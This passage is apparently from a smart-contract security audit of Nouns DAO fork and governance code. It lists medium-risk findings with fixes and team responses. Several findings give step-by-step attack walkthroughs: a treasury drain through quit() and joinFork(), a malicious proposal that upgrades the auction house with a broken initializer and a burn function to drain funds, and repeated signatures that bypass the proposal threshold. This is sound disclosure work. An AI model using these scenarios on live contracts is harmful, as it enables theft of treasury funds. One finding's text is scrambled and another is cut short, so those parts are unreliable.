          uint256 totalSupply = adjustedTotalSupply();
          for (uint256 i = 0; i < tokenIds.length; i++) {
              nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]);
          }
          for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) {
              IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]);
              uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply;
  >>          bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend);
              if (!erc20Sent) revert QuitERC20TransferFailed();
          }
          uint256 ethToSend = (address(timelock).balance * tokenIds.length) / totalSupply;
          bool ethSent = timelock.sendETH(msg.sender, ethToSend);
          if (!ethSent) revert QuitETHTransferFailed();
          emit Quit(msg.sender, tokenIds);
      }

4. cBob has joined the fork with another Noun, and the stETH transfer concludes. The forked treasury is 2 stETH and 300 ETH, while 1 stETH was just sent to cBob.
5. With quit() resumed, (address(timelock).balance * tokenIds.length) / totalSupply = (300 * 1) / 2 = 150 ETH is sent to cBob:
• NounsDAOLogicV1Fork.sol#L201-L222

      function quit(uint256[] calldata tokenIds) external nonReentrant {
          checkGovernanceActive();
          uint256 totalSupply = adjustedTotalSupply();
          for (uint256 i = 0; i < tokenIds.length; i++) {
              nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]);
          }
          for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) {
              IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]);
              uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply;
              bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend);
              if (!erc20Sent) revert QuitERC20TransferFailed();
          }
  >>      uint256 ethToSend = (address(timelock).balance * tokenIds.length) / totalSupply;
          bool ethSent = timelock.sendETH(msg.sender, ethToSend);
          if (!ethSent) revert QuitETHTransferFailed();
          emit Quit(msg.sender, tokenIds);
      }

6. The forked treasury is 2 stETH and 150 ETH. cBob calls quit() again without re-entering (say on a zero-original-Nouns-balance condition), and obtains 1 stETH and 75 ETH; the same is left for Alice. Bob stole 25 ETH from Alice.
The attacking function logic can be as simple as: {quit() as long as there is a forked Noun on my balance; perform joinFork() in the callback as long as there is a Noun on my balance}. Alice lost a part of the treasury funds. The scale of the steps above can be increased to drain more significant value in absolute terms. Per low likelihood and high principal-funds-loss impact, setting the severity to medium.
Recommendation: The core issue is that the state variables, the Nouns total supply and the treasury asset balances, are read both before and after the external calls.
This can be fixed by gathering the state beforehand, for example:
• NounsDAOLogicV1Fork.sol#L201-L222

      function quit(uint256[] calldata tokenIds) external nonReentrant {
          checkGovernanceActive();
          uint256 totalSupply = adjustedTotalSupply();

+         uint256 erc20length = erc20TokensToIncludeInQuit.length;
+         uint256[] memory balances = new uint256[](erc20length + 1);
+         IERC20[] memory erc20tokens = new IERC20[](erc20length);
+         for (uint256 i = 0; i < erc20length; i++) {
+             erc20tokens[i] = IERC20(erc20TokensToIncludeInQuit[i]);
+             balances[i] = erc20tokens[i].balanceOf(address(timelock));
+         }
+         balances[erc20length] = address(timelock).balance;

          for (uint256 i = 0; i < tokenIds.length; i++) {
              nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]);
          }

-         for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) {
+         for (uint256 i = 0; i < erc20length; i++) {
-             IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]);
-             uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply;
-             bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend);
+             uint256 tokensToSend = (balances[i] * tokenIds.length) / totalSupply;
+             bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20tokens[i]), tokensToSend);
              if (!erc20Sent) revert QuitERC20TransferFailed();
          }

-         uint256 ethToSend = (address(timelock).balance * tokenIds.length) / totalSupply;
+         uint256 ethToSend = (balances[erc20length] * tokenIds.length) / totalSupply;
          bool ethSent = timelock.sendETH(msg.sender, ethToSend);
          if (!ethSent) revert QuitETHTransferFailed();

          emit Quit(msg.sender, tokenIds);
      }

Nouns: Fixed in PR 722.
Spearbit: Fix looks good.

+5.2.6 A malicious DAO can mint arbitrary fork DAO tokens
Severity: Medium Risk
Context: NounsDAOV3Proposals.sol#L495, NounsDAOV3Fork.sol#L203-L205, NounsTokenFork.sol#L166-L174
Description: The original DAO is assumed to be honest during the fork period, which is reinforced in the protocol by preventing it from executing any malicious proposals during that time. Fork joiners are minted fork DAO tokens by the original DAO via claimDuringForkPeriod(), which enforces the fork period on the fork DAO side. However, the notion of the fork period is different on the fork DAO compared to the original DAO (as described in Issue 16): while the original DAO excludes forkEndTimestamp from the fork period, the fork DAO includes forkingPeriodEndTimestamp in its notion of the fork period. If the original DAO executes a malicious proposal exactly in the block at forkEndTimestamp which makes a call to claimDuringForkPeriod() to mint arbitrary fork DAO tokens, then the proposal will succeed on the original DAO side, because it is one block beyond its notion of the fork period. The claimDuringForkPeriod() will succeed on the fork DAO side, because it is in the last block of its notion of the fork period. The original DAO can therefore successfully mint arbitrary fork DAO tokens, which can be used to: 1) brick the fork DAO when those tokens are attempted to be minted via auctions later, or 2) manipulate the fork DAO governance to steal its treasury funds.
In PoS, blocks are exactly 12 seconds apart. With forkEndTimestamp = block.timestamp + ds.forkPeriod; and ds.forkPeriod now set to 7 days, forkEndTimestamp is exactly 50400 blocks (7*24*60*60/12) after the block in which executeFork() was executed. A malicious DAO can coordinate to execute such a proposal exactly in that block. Low likelihood + High impact = Medium severity.
Recommendation: Make the treatment of the fork period consistent between the original and fork DAOs in:
• NounsTokenFork.sol#L166-L174

      function claimDuringForkPeriod(address to, uint256[] calldata tokenIds) external {
          if (msg.sender != escrow.dao()) revert OnlyOriginalDAO();
-         if (block.timestamp > forkingPeriodEndTimestamp) revert OnlyDuringForkingPeriod();
+         if (block.timestamp >= forkingPeriodEndTimestamp) revert OnlyDuringForkingPeriod();
          for (uint256 i = 0; i < tokenIds.length; i++) {
              uint256 nounId = tokenIds[i];
              _mintWithOriginalSeed(to, nounId);
          }
      }

Nouns: Implemented fix: nounsDAO/nouns-monorepo#719.
Spearbit: Verified that PR 719 fixes the issue as recommended.

+5.2.7 Inattentive fork escrowers may lose funds to fork quitters
Severity: Medium Risk
Context: NounsDAOLogicV1Fork.sol#L201-L222, Fork-Spec, NounsTokenFork.sol#L148-L157, NounsDAOLogicV1Fork.sol#L346-L349
Description: Fork escrowers already have their original DAO treasury pro rata funds transferred to the fork DAO treasury (when the fork executes) and are expected to claimFromEscrow() after the fork executes to mint their fork DAO tokens and thereby lay claim to their pro rata share of the fork DAO treasury for governance or exiting. Inattentive fork escrowers who fail to do so will force a delayed governance of 30 days (currently proposed value) on the fork DAO, and beyond that will allow fork DAO members to quit with a greater share of the fork DAO treasury, because fork execution transfers all escrowers' original DAO treasury funds to the fork DAO treasury.
Inattentive slow-/non-claiming fork escrowers may lose funds to quitters if they do not claim their fork DAO tokens before its governance is active 30 days after the fork executes. They will also be unaccounted for in DAO functions like quorum and proposal threshold. While we would expect fork escrowers to be attentive and claim their fork DAO tokens well within the delayed governance period, the protocol design can be more defensive of slow-/non-claimers by protecting their funds on the fork DAO from quitters. Low likelihood + High impact = Medium severity.
Recommendation: Consider changing NounsDAOLogicV1Fork.adjustedTotalSupply() to be nouns.totalSupply() - nouns.balanceOf(address(timelock)) + nouns.remainingTokensToClaim(), which will include any unclaimed tokens in fork DAO calculations (sketched below). This will effectively freeze the slow-/non-claiming fork escrowers' funds within the fork DAO treasury, instead of them losing the funds to quitters (outside of any executed proposals acting on treasury funds), if they do not claim within 30 days. Non-claimers will permanently affect the fork DAO supply, which affects proposals/quitting, but that is valid because unclaimed original DAO escrowed tokens have a perpetual 1:1 right to equivalent fork DAO tokens, which should be accounted for correctly.
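For reference, a minimal sketch of the recommended calculation (the actual change is in PR 723):

      function adjustedTotalSupply() public view returns (uint256) {
          // Count unclaimed escrowed tokens as part of the fork DAO supply so that
          // quitters cannot take the non-claimers' pro rata share.
          return nouns.totalSupply() - nouns.balanceOf(address(timelock)) + nouns.remainingTokensToClaim();
      }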
Nouns: Acknowledged, and here's a fix PR: nounsDAO/nouns-monorepo#723.
Spearbit: Verified that PR 723 fixes the issue as recommended.

+5.2.8 Upgrading the timelock without transferring the Nouns from the old timelock balance will increase the adjusted total supply
Severity: Medium Risk
Context: ProposeTimelockMigrationCleanupMainnet.s.sol#L94
Description: There is one Noun on the timelock V1 balance, and there can be others as of migration time:
• etherscan.io/token/0x9c8ff314c9bc7f6e59a9d9225fb22946427edc03?a=0x0BC3807Ec262cB779b38D65b38158acC3bfedE10
Changing ds.timelock without a Nouns transfer will increase the adjusted total supply:
• NounsDAOV3Fork.sol#L199-L201

      function adjustedTotalSupply(NounsDAOStorageV3.StorageV3 storage ds) internal view returns (uint256) {
          return ds.nouns.totalSupply() - ds.nouns.balanceOf(address(ds.timelock)) - ds.forkEscrow.numTokensOwnedByDAO();
      }

As of the time of this writing, adjustedTotalSupply() will be increased by 1 due to the treasury token reclassification; valuing the treasury's ETH and stETH holdings at the ETH price in USD, the upgrade will cause a (13470 + 14968) * 1733.0 * (1 / 742 - 1 / 743) ≈ 89 USD loss per Noun, or (13470 + 14968) * 1733.0 / 743 ≈ 66330 USD cumulatively for all Nouns holders. Per high likelihood and low impact, setting the severity to medium.
Recommendation: Consider adding to ProposeTimelockMigrationCleanupMainnet the step of moving the treasury Nouns from the timelock V1 to the timelock V2 contract, to keep the adjustedTotalSupply() reading unchanged.
Nouns: Fixed in PR 721.
Spearbit: Fix looks okay, conditional on timelockV1 owning no other Nouns besides 687 as of the time of the upgrade.

+5.2.9 Fork escrowers can exploit the fork or force late joiners to quit
Severity: Medium Risk
Context: NounsDAOLogicV1Fork.sol#L347
Description: Based on the current supply of Nouns and the following parameters that will be used during the upgrade to V3:
• Nouns total supply: 743
• forkThresholdBPS_: 2000 (20%)
• forkThreshold: 148; hence 149 Nouns need to be escrowed to be able to call executeFork()
The following attack vector would be possible:
1. The attacker escrows 75 tokens.
2. Bob escrows 74 tokens to reach the forkThreshold.
3. Bob calls executeFork() and claimFromEscrow().
4. The attacker calls claimFromEscrow() right away. As nouns.remainingTokensToClaim() is now zero, governance is active and proposals can be created.
5. The attacker creates a malicious proposal. Currently the attacker has 75 Nouns in the fork and Bob has 74. This means that the attacker has the majority of the voting power, and whatever he proposes cannot be denied.
• NounsForkToken.getPriorVotes(attacker, ) -> 75
• NounsForkToken.getPriorVotes(Bob , ) -> 74
6. The proposal is created with the following description: "Proposal created to upgrade the NounsAuctionHouseFork to a new implementation similar to the main NounsAuctionHouse". The attacker deploys this new implementation and simply performs the following change in the code:

      modifier initializer() {
-         require(_initializing || !_initialized, "Initializable: contract is already initialized");
+         require(!_initializing || _initialized, "Initializable: contract is already initialized");
          bool isTopLevelCall = !_initializing;
          if (isTopLevelCall) {
              _initializing = true;
              _initialized = true;
          }
          _;
          if (isTopLevelCall) {
              _initializing = false;
          }
      }

The proposal is created with the following data:

      targets[0] = address(contract_NounsAuctionHouseFork);
      values[0] = 0;
      signatures[0] = 'upgradeTo(address)';
      calldatas[0] = abi.encode(address(contract_NounsAuctionHouseForkExploitableV1));

7. The proposal is created and is now in the Pending state. During the next days, users keep joining the fork, increasing the funds of the fork treasury, as the fork period is still active.
8. 5 days later the proposal is in the Active state and the attacker votes to pass it. Bob, who does not like the proposal, votes to reject it.
• quorumVotes: 14
• forVotes: 75
• againstVotes: 74
9. As the attacker and Bob were the only users that had any voting power at the time of proposal creation, five days later the proposal is successful.
10. The proposal is queued.
11. 3 weeks later the proposal is executed.
12. The NounsAuctionHouseFork contract is upgraded to the malicious version and the attacker re-initializes it and sets himself as the owner:

      contract_NounsAuctionHouseFork.initialize(attacker, NounsForkToken, , 0, 0, 0, 0)

13. The attacker, who is now the owner, upgrades the NounsAuctionHouseFork contract, once again, to a new implementation that implements the following function:

      function burn(uint256[] memory _nounIDs) external onlyOwner {
          for (uint256 i; i < _nounIDs.length; ++i) {
              nouns.burn(_nounIDs[i]);
          }
      }

14. The attacker now burns all the Nouns tokens in the fork except the ones that he owns.
15. The attacker calls quit(), draining the whole treasury:

      NounsTokenFork.totalSupply() -> 75
      attacker.balance -> 0
      contract_stETH.balanceOf(attacker) -> 0
      forkTreasury.balance -> 2005_383580080753701211
      contract_stETH.balanceOf(forkTreasury) -> 2005_383580080753701210
      attacker calls -> contract_NounsDAOLogicV1Fork.quit([0, ... 74])
      attacker.balance -> 2005_383580080753701211
      contract_stETH.balanceOf(attacker) -> 2005_383580080753701208
      forkTreasury.balance -> 0
      contract_stETH.balanceOf(forkTreasury) -> 1

Basically, the condition that should be met for this exploit is that at the time of proposal creation the attacker has more than 51% of the voting power. This is more likely to happen in small forks. If this happens, users will be forced to leave or be exploited. As there is no vetoer role, no one will be able to stop this type of proposal.
Recommendation: Consider removing the checkGovernanceActive() function and, instead, not allowing users to create any proposal in the fork until the fork period is no longer active, i.e. isForkPeriodActive == false. Consider also auditing any new proposal that is added to the DAO to mitigate these risks.
Nouns: Followed Spearbit's recommendation and fixed the issue in PR 717. Proposals cannot be created and users cannot quit the fork until the forking period is over.
Spearbit: Acknowledged.

+5.2.10 Including non-standard ERC20 tokens will revert and prevent forking/quitting
Severity: Medium Risk
Context: NounsDAOExecutorV2.sol#L223, NounsDAOV3Fork.sol#L228-L229, NounsDAOLogicV1Fork.sol#L213-L214
Description: If erc20TokensToIncludeInFork or erc20TokensToIncludeInQuit accidentally/maliciously include non-conforming ERC20 tokens, such as USDT, which do not return a boolean value on transfers, then sendProRataTreasury() and quit() will revert, because they expect timelock.sendERC20() to return true from the underlying ERC20 transfer call. The use of transfer() instead of safeTransfer() allows this scenario. Low likelihood + High impact = Medium severity. Inclusion of USDT-like tokens in the protocol will make sendProRataTreasury() and quit() revert, preventing forking/quitting.
Recommendation: Consider the use of safeTransfer() instead of transfer() in sendERC20(), and remove the check in callers on the expected boolean return value (sketched below).
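For illustration, a minimal sketch of the recommended change in the timelock's sendERC20(), assuming OpenZeppelin's SafeERC20; the signature follows the call sites quoted in this report, and the actual fix is in PR 720:

      using SafeERC20 for IERC20;

      function sendERC20(address recipient, address erc20Token, uint256 tokensToSend) external returns (bool) {
          // (access control as in the original function)
          // safeTransfer supports tokens that return no value (e.g. USDT) and reverts on
          // failure, so callers no longer need to rely on a boolean return value.
          IERC20(erc20Token).safeTransfer(recipient, tokensToSend);
          return true;
      }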
Nouns: Acknowledged. Fixed in PR 720.
Spearbit: Verified that PR 720 fixes the issue as recommended.

+5.2.11 Changing voteSnapshotBlockSwitchProposalId after it was set allows for vote double counting
Severity: Medium Risk
Context: NounsDAOV3Admin.sol#L472-L482
Description: Currently ds.voteSnapshotBlockSwitchProposalId can be changed after it was once set to the next proposal id; there are no restrictions on repeated setting. At the same time, proposal votes are counted without saving the additional information needed to reconstruct the timing, so a voteSnapshotBlockSwitchProposalId moved forward as a result of such a second _setVoteSnapshotBlockSwitchProposalId() call will produce a situation where all the older, already cast votes for the proposals with old_voteSnapshotBlockSwitchProposalId <= id < new_voteSnapshotBlockSwitchProposalId will be counted as of proposal.startBlock, while all the newer, still-to-be-cast votes for the very same proposals will be counted as of proposal.creationBlock. Since the voting power of users can vary in-between these timestamps, this violates the equality of voting conditions for all such proposals. Double counting will be possible, and total votes greater than the total supply can be cast this way: say Bob has transferred his Nouns to Alice between proposal.startBlock and proposal.creationBlock, Alice voted before the change, and Bob voted after the change. Bob's Nouns will be counted twice.
Severity is medium: the impact looks high, as a violation of equal-footing voting paves the way for voting manipulations, but there is a low-likelihood prerequisite of passing a proposal for the second update of voteSnapshotBlockSwitchProposalId. The latter can happen as part of a bigger pack of changes: the _setVoteSnapshotBlockSwitchProposalId() call does not have arguments, and by itself repeating it doesn't look incorrect.
Recommendation: Consider controlling the one-time-switch nature of this parameter directly in the code, for example:
• NounsDAOV3Admin.sol#L34-L35

      error InvalidProposalUpdatablePeriodInBlocks();
+     error VoteSnapshotSwitchAlreadySet();

• NounsDAOV3Admin.sol#L472-L482

      function _setVoteSnapshotBlockSwitchProposalId(NounsDAOStorageV3.StorageV3 storage ds) external onlyAdmin(ds) {
-         uint256 newVoteSnapshotBlockSwitchProposalId = ds.proposalCount + 1;
          uint256 oldVoteSnapshotBlockSwitchProposalId = ds.voteSnapshotBlockSwitchProposalId;
+         if (oldVoteSnapshotBlockSwitchProposalId > 0) {
+             revert VoteSnapshotSwitchAlreadySet();
+         }
+         uint256 newVoteSnapshotBlockSwitchProposalId = ds.proposalCount + 1;
          ds.voteSnapshotBlockSwitchProposalId = newVoteSnapshotBlockSwitchProposalId;
          emit VoteSnapshotBlockSwitchProposalIdSet(
              oldVoteSnapshotBlockSwitchProposalId,
              newVoteSnapshotBlockSwitchProposalId
          );
      }

Nouns: Implemented recommendation: PR 718.
Spearbit: Fix looks good.

+5.2.12 Key fork parameters are set outside of the proposal flow and aren't controlled in the code
Severity: Medium Risk
Context: ForkDAODeployer.sol#L31-L81
Description: These configuration parameters are crucial for the fork workflow and the new DAO logic, but aren't checked when being set in ForkDAODeployer's constructor:
• ForkDAODeployer.sol#L31-L81

      contract ForkDAODeployer is IForkDAODeployer {
          ...
          constructor(
              address tokenImpl_,
              address auctionImpl_,
              address governorImpl_,
              address treasuryImpl_,
              uint256 delayedGovernanceMaxDuration_,
              uint256 initialVotingPeriod_,
              uint256 initialVotingDelay_,
              uint256 initialProposalThresholdBPS_,
              uint256 initialQuorumVotesBPS_
          ) {
              ...
              delayedGovernanceMaxDuration = delayedGovernanceMaxDuration_;
              initialVotingPeriod = initialVotingPeriod_;
              initialVotingDelay = initialVotingDelay_;
              initialProposalThresholdBPS = initialProposalThresholdBPS_;
              initialQuorumVotesBPS = initialQuorumVotesBPS_;

While most parameters are set via proposals directly and are controlled in the corresponding setters, these 5 variables are defined only once, on ForkDAODeployer construction, and are neither per se visible in proposals (ForkDAODeployer is set there only as an address) nor controlled within corresponding setters this way. Their values aren't controlled on construction either:
• NounsDAOLogicV3.sol#L820-L840

      /**
       * @notice Admin function for setting the fork related parameters
       * @param forkEscrow_ the fork escrow contract
       * @param forkDAODeployer_ the fork dao deployer contract
       * @param erc20TokensToIncludeInFork_ the ERC20 tokens used when splitting funds to a fork
       * @param forkPeriod_ the period during which it's possible to join a fork after exeuction
       * @param forkThresholdBPS_ the threshold required of escrowed nouns in order to execute a fork
       */
      function _setForkParams(
          address forkEscrow_,
          address forkDAODeployer_,
          address[] calldata erc20TokensToIncludeInFork_,
          uint256 forkPeriod_,
          uint256 forkThresholdBPS_
      ) external {
          ds._setForkEscrow(forkEscrow_);
          ds._setForkDAODeployer(forkDAODeployer_);
          ds._setErc20TokensToIncludeInFork(erc20TokensToIncludeInFork_);
          ds._setForkPeriod(forkPeriod_);
          ds._setForkThresholdBPS(forkThresholdBPS_);
      }

• NounsDAOV3Admin.sol#L484-L495

      /**
       * @notice Admin function for setting the fork DAO deployer contract
       */
      function _setForkDAODeployer(NounsDAOStorageV3.StorageV3 storage ds, address newForkDAODeployer) external onlyAdmin(ds) {
          address oldForkDAODeployer = address(ds.forkDAODeployer);
          ds.forkDAODeployer = IForkDAODeployer(newForkDAODeployer);
          emit ForkDAODeployerSet(oldForkDAODeployer, newForkDAODeployer);
      }

Impact: as an example, setting delayedGovernanceMaxDuration = 0 bypasses NounsDAOLogicV1Fork's checkGovernanceActive() control and allows for stealing the whole treasury of a new forked DAO with a NounsTokenFork.claimFromEscrow() -> NounsDAOLogicV1Fork.quit() call back-running the executeFork() deployment transaction. The attacker will be entitled to 1 / 1 = 100% of the new DAO funds, being the only one who claimed.
Setting medium severity per low likelihood and high impact of misconfiguration, which can happen either as an operational mistake or driven by malicious intent.
Recommendation: Consider controlling delayedGovernanceMaxDuration, initialVotingPeriod, initialVotingDelay, initialProposalThresholdBPS and initialQuorumVotesBPS in the constructor to be within hardcoded boundary values (sketched below). The slight increase in size and gas cost is well justified in this setting.
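For illustration, a minimal sketch of such constructor checks; the bound constants, their values and the error names are hypothetical placeholders, not recommendations for specific numbers:

      // Hypothetical bounds; the actual values would need to be agreed upon by the DAO.
      uint256 public constant MAX_DELAYED_GOVERNANCE_MAX_DURATION = 30 days;
      uint256 public constant MIN_INITIAL_VOTING_PERIOD = 7200; // roughly 1 day of blocks

      constructor(
          ...
      ) {
          if (delayedGovernanceMaxDuration_ == 0 || delayedGovernanceMaxDuration_ > MAX_DELAYED_GOVERNANCE_MAX_DURATION)
              revert InvalidDelayedGovernanceMaxDuration(); // hypothetical error
          if (initialVotingPeriod_ < MIN_INITIAL_VOTING_PERIOD)
              revert InvalidInitialVotingPeriod(); // hypothetical error
          // ... analogous checks for initialVotingDelay_, initialProposalThresholdBPS_ and initialQuorumVotesBPS_
          ...
      }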
Nouns: Acknowledged, won't fix. We disagree with the risk assessment, and like the freedom the current approach affords us. Why we think it's low risk: these parameters are actually easy to review in any proposal that sets a fork deployer, since the implementation is available onchain with these parameters set.
Spearbit: Acknowledged.

+5.2.13 A malicious DAO can hold token holders captive by setting forkPeriod to an unreasonably low value
Severity: Medium Risk
Context: NounsDAOV3Admin.sol#L516-L524
Description: A malicious majority can reduce the number of Noun holders joining an executed fork by setting the forkPeriod to an unreasonably low value, e.g. 0, because there is no MIN_FORK_PERIOD enforced (the MAX is 14 days). This, in combination with an unreasonably high forkThresholdBPS (no min/max enforced), will allow a malicious majority to hold captive those minority Noun holders who missed the fork escrow window, cannot join the fork in the unreasonably small fork period, and do not have sufficient voting power to fork again.
While the accidental setting of the lower bound to an undesirable value poses a lower risk than that of the upper bound, this is yet another vector of attack by a malicious majority on forking capability/effectiveness. While the majority can upgrade the DAO entirely at will to circumvent all such guardrails, we hypothesise that would get more/all attention from token holders than modification of governance/fork parameters, whose risk/impact may not be immediately apparent to non-technical or even technical holders. So, unless there is an automated impact review/analysis performed as part of governance processes, such proposal vectors on governance/forking parameters should be considered as posing non-negligible risk.
Impact: Inattentive minority Noun holders are unable to join the fork and are forced to stick with the original DAO. Low likelihood + High impact = Medium severity.
Recommendation: (1) Consider a MIN_FORK_PERIOD value, e.g. 2 days, for forkPeriod, which gives a better opportunity to inattentive/unsure minority Noun holders to join the fork now that it already exists. (2) Consider preventing the decrease of forkPeriod if a fork is in the escrow period.
Nouns: Mitigation: PR 716.
Spearbit: Verified that PR 716 fixes the issue by enforcing a MIN_FORK_PERIOD of 2 days in _setForkPeriod().

+5.2.14 A malicious DAO can prevent forking by manipulating the forkThresholdBPS value
Severity: Medium Risk
Context: NounsDAOV3Admin.sol#L530-L537
Description: While some of the documentation (see 1 and 2) notes that the fork threshold is expected to be 20%, forkThresholdBPS is a DAO-governance-controlled value that may be modified via _setForkThresholdBPS(). A malicious majority can prevent forking at any time by setting forkThresholdBPS to an unreasonably high value that is >= the majority voting power. For a fork that is slowly gathering support via escrowing (thus giving time for a DAO proposal to be executed), a malicious majority can reactively manipulate forkThresholdBPS to prevent that fork from being executed. While the governance process gives an opportunity to detect and block such malicious proposals, the assumption is that a malicious majority can force through any proposal, even a visibly malicious one. Also, it is not certain that all governance proposals undergo thorough scrutiny of security properties and their impacts. Token holders need to actively monitor all proposals for malicious updates to create, execute and join a fork before such a proposal takes effect. A malicious majority can prevent a minority from forking by manipulating the forkThresholdBPS value. Low likelihood + High impact = Medium severity.
Recommendation: Mitigation options: (1) Consider a MAX_FORK_THRESHOLD value, e.g. 50%, for forkThresholdBPS. (2) Consider preventing the increase of forkThresholdBPS if a fork is in the escrow period.
Nouns:
+5.2.15 A malicious DAO can prevent/deter token holders from executing/joining a fork by including arbi- trary addresses in erc20TokensToIncludeInFork Severity: Medium Risk Context: NounsDAOV3Fork.sol#L224-L228 Description: As motivated in the fork spec, forking is a minority protection mechanism that should always allow a group of minority token holders to exit together into a new instance of Nouns DAO. in the (modifiable original DAO may a malicious majority in However, erc20TokensToIncludeInFork on balanceOf() or transfer() calls to prevent token holders from executing or joining a fork. While the governance process gives an opportunity to detect and block such malicious proposals, the assumption is that a malicious majority can force through any proposal, even a visibly malicious one. Also, it is not certain that all governance proposals undergo thorough scrutiny of security properties which allows a proposal to hide malicious ERC20 tokens and get them included in the DAO's allow list. Token holders need to monitor all proposals for malicious updates to create, execute and join a fork before such a proposal takes effect. _setErc20TokensToIncludeInFork()) addresses revert arbitrary include that via Furthermore, a forking token holder may not necessarily want to receive all the DAO's ERC20 tokens in their new fork DAO for various reasons. For e.g., custody of certain ERC20 tokens may not be legal in their regulatory jurisdictions and so they may not want to interact with a DAO whose treasury holds such tokens and may send them at some point (e.g. rage quit). Minority token holders may even want to fork specifically because of an ERC20's presence or proposed inclusion in the DAO treasury. Giving forking holders a choice of ERC20s to take to fork DAO gives them a choice to fork anytime only with ETH and a subset of approved tokens if the DAO has already managed to add malicious/contentious ERC20s in the list. 1. A malicious DAO can prevent unsuspecting/inattentive or future token holders from forking and taking out their pro rata funds, which is the main motivation for minority protection as specified. 2. A forking token holder is forced to end up with a fork DAO treasury that has all the original DAO's ERC20 tokens without having a choice, which may deter them from creating/executing/joining a fork in the first place. Low likelihood + High impact = Medium severity. Recommendation: Reconsider the design choice and threat/trust models to evaluate the feasibility of a better one, e.g. when a fork gets triggered, the first caller of escrowToFork() (the initiator) could get to choose a subset of erc20TokensToIncludeInFork for their fork, after which executefork() and all joinFork()s only send those tokens to the fork DAO treasury. Nouns: Won't fix. We see the risk of adding a malicious token to erc20TokensToIncludeInQuit to be low, because it needs to go through a proposal process which is being reviewed by the DAO members. In addition, we don't want to give the first caller of escrowToFork special privileges that may not be in agreement with other members who wish to fork. Spearbit: Acknowledged. 
+5.2.16 A malicious new DAO can prevent/deter token holders from rage quitting by including arbitrary addresses in erc20TokensToIncludeInQuit
Severity: Medium Risk
Context: NounsDAOLogicV1Fork.sol#L201-L215
Description: As described in the fork spec: "New DAOs are deployed with vanilla ragequit in place; otherwise it's possible for a new DAO majority to collude to hurt a minority, and the minority wouldn't have any last resort if they can't reach the forking threshold; furthermore bullies/attackers can recursively chase minorities into fork DAOs in an undesired attrition war.". However, a malicious new DAO may include arbitrary addresses in erc20TokensToIncludeInQuit (modifiable via _setErc20TokensToIncludeInQuit()) that revert on balanceOf() or transfer() calls, to prevent token holders from rage quitting. While the governance process gives an opportunity to detect and block such malicious proposals, the assumption is that a malicious majority can force through any proposal, even a visibly malicious one. Also, it is not certain that all governance proposals undergo thorough scrutiny of security properties, which allows a proposal to hide malicious ERC20 tokens and get them included in the DAO's allow list. Token holders need to monitor all proposals for malicious updates and rage quit before such a proposal takes effect. Furthermore, a rage quitting token holder may not necessarily want to receive all of the DAO's ERC20 tokens, for various reasons. For example, custody of certain ERC20 tokens may not be legal in their regulatory jurisdiction.
(1) A malicious new DAO can prevent unsuspecting/inattentive token holders from rage quitting and taking out their pro rata funds, which is a critical capability for minority protection as specified. (2) A rage quitting token holder is forced to receive all of the DAO's ERC20 tokens without having a choice, which may deter them from quitting.
Recommendation: Consider accepting an ERC20 token list, which is a subset of erc20TokensToIncludeInQuit, from the user, to allow them to choose/skip ERC20 tokens (sketched below).
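For illustration, a minimal sketch of a quit() variant taking a user-chosen subset; this is hypothetical, simplified code (the actual fix is in PR 732):

      function quit(uint256[] calldata tokenIds, address[] calldata erc20TokensToInclude) external nonReentrant {
          // Each requested token must be on the DAO-approved erc20TokensToIncludeInQuit list;
          // the membership check is left abstract here.
          for (uint256 i = 0; i < erc20TokensToInclude.length; i++) {
              require(isApprovedQuitToken(erc20TokensToInclude[i]), 'unsupported token'); // hypothetical helper
          }
          // ... proceed as in quit(), but iterate only over erc20TokensToInclude
      }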
Confirmed with PoC: veto_poc.txt. Low likelihood + High impact = Medium severity.

Recommendation: Check the vetoed proposal's target timelock via getProposalTimelock() and use that, as done by the queue(), execute() and cancel() functions.

Nouns: Mitigation: PR 715.

Spearbit: Verified that PR 715 fixes the issue as recommended.

+5.2.18 Proposal threshold can be bypassed through the proposeBySigs() function

Severity: Medium Risk

Context: NounsDAOV3Proposals.sol#L229

Description: The function proposeBySigs() allows users to delegate their voting power to a proposer through signatures so the proposer can create a proposal. The only condition is that the sum of the signers' voting power should be higher than the proposal threshold.

In the line uint256 proposalId = ds.proposalCount = ds.proposalCount + 1;, the ds.proposalCount is increased but the proposal has not been created yet, meaning that the NounsDAOStorageV3.Proposal struct is, at this point, uninitialized, so when the checkNoActiveProp() function is called the proposal state is DEFEATED. As the proposal state is DEFEATED, the checkNoActiveProp() call would not revert in the case that a signer is repeated in the NounsDAOStorageV3.ProposerSignature[] array:

function checkNoActiveProp(NounsDAOStorageV3.StorageV3 storage ds, address proposer) internal view {
    uint256 latestProposalId = ds.latestProposalIds[proposer];
    if (latestProposalId != 0) {
        NounsDAOStorageV3.ProposalState proposersLatestProposalState = state(ds, latestProposalId);
        if (
            proposersLatestProposalState == NounsDAOStorageV3.ProposalState.ObjectionPeriod ||
            proposersLatestProposalState == NounsDAOStorageV3.ProposalState.Active ||
            proposersLatestProposalState == NounsDAOStorageV3.ProposalState.Pending ||
            proposersLatestProposalState == NounsDAOStorageV3.ProposalState.Updatable
        ) revert ProposerAlreadyHasALiveProposal();
    }
}

Because of this, it is possible to bypass the proposal threshold and create any proposal by signing multiple proposerSignatures with the same signer over and over again. This would keep increasing the total voting power accounted by the smart contract until this voting power is higher than the proposal threshold.

Medium likelihood + Medium impact = Medium severity.

Recommendation: Consider verifying the NounsDAOStorageV3.ProposerSignature[] array by calling the verifySignersCanBackThisProposalAndCountTheirVotes() function before creating the proposal via createNewProposal(). By doing this, when verifySignersCanBackThisProposalAndCountTheirVotes() is called the proposal state will be correct and any repeated signer would cause a revert during the checkNoActiveProp(ds, signer); call.

